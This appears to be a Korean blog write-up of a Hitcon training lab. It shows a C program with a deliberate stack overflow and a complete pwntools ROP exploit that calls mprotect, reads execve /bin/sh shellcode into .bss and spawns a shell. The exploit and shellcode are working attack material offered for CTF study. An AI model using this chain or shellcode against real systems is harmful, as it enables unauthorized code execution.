simplerop.c
1
2
3
4
5
6
7
8
9
|
#include <stdio.h>
int main(){
char buf[20];
puts("ROP is easy is'nt it ?");
printf("Your input :");
fflush(stdout);
read(0,buf,100);
}
http://colorscripter.com/info#e" target="_blank" style="color:#4f4f4f; text-decoration:none">Colored by Color Scripter
|
보호기법 확인
해당 바이너리는 system, exec계열의 함수가 빠져있다.
statically linked로 되어있기 때문에 mprotect의 주소를 가져올 수 있다. (leak을 안해도됨)
따라서 mprotect로 실행권한을 주고 shellcode를 직접 삽입해서 실행시킨다.
shellcode말고 syscall (int 0x80 명령어)를 통해서 shell을 실행할 수 있다.
sys_execve의 table번호가 0xb이기 때문에 eax = 0xb, ebx = &/bin/sh, ecx = 0x0, edx = 0x0으로
설정하고 int 0x80 명령어로 RET시키면 shell을 얻을 수 있다.
저는 전자의 방법을 선택했습니당.
slv.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
|
from pwn import *
p = process('./simplerop')
dummy = 'A'* (0x38-0x1c+0x4)
pop2ret_Addr = 0x0807b4e8
pop3ret_Addr = 0x08051d7c
bss_Addr = 0x80eb000
mprotect_Addr = 0x806d870
read_Addr = 0x806cd50
# gdb-peda command 'shellcode generate x86/linux exec'
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68
\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89
\xca\x6a\x0b\x58\xcd\x80"
shellDummy = '\x90'*(0x200 - len(shellcode))
shellcode = shellDummy + shellcode
payload = ''
payload += dummy
payload += p32(mprotect_Addr)
payload += p32(pop3ret_Addr)
payload += p32(bss_Addr)
payload += p32(0x2000)
payload += p32(0x7)
payload += p32(read_Addr)
payload += p32(pop3ret_Addr)
payload += p32(0x0)
payload += p32(bss_Addr)
payload += p32(0x200)
payload += p32(bss_Addr)
# payload
# mprotect(bss_Addr, 0x2000, 0x7)
# read(0, bss_Addr, 0x200)
# ret bss_Addr(== jmp bss_Addr, call bss_Addr)
p.recvuntil(':')
p.send(payload)
p.send(shellcode)
p.interactive()
http://colorscripter.com/info#e" target="_blank" style="color:#4f4f4f; text-decoration:none">Colored by Color Scripter
|
Exploit Flow
1. Gadget, bss, mprotect, read 주소 구하기
2. mprotect(bss_Addr, 0x2000, 0x7)로 bss_Addr ~ bss_Addr+0x2000에 0x7(read, write, execute)권한부여
3. read(0, bss_Addr, 0x200)으로 stdin으로 bss_Addr에 0x200byte만큼 쓰기
4. 생성한 shellcode send
5. Ret to bss_Addr
6. exploit.
'System > Hitcon training' 카테고리의 다른 글
190421-lab7 (0) | 2019.04.21 |
---|---|
190403-lab6 (0) | 2019.04.03 |
190403-lab4 (0) | 2019.04.03 |
190403-lab3 (0) | 2019.04.03 |
190403-lab2 (0) | 2019.04.03 |